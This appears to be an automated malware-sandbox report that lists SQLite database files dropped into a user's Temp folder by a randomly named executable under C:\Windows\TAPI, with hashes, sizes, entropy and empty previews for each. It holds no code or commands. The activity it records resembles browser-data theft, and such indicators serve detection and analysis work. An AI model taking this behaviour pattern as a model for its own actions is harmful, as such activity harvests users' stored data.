                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\HZug7Ld03I

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\HiERJNs0sk

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\I6ibrSRsy4

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\IGYw7foERf

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\IH2FLS5YIm

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\IKNmCXs8Hl

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\IKZ8NQYgXg

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\IQh2SUyNZf

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\IgLlwAztHD

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\IhCM28i2mX

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\IrGxFMMuc3

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\JUhZkYjqyN

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\JkX1ie4U9y

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\JwrVAVCec9

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\JzHQCntgPc

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\K0WA9Co6Bd

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\KUIEH23Ryh

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Ka4YwGjr1q

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Kb0mWdxSKs

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\KhcThvOvuP

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\KpYhbhMgjw

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
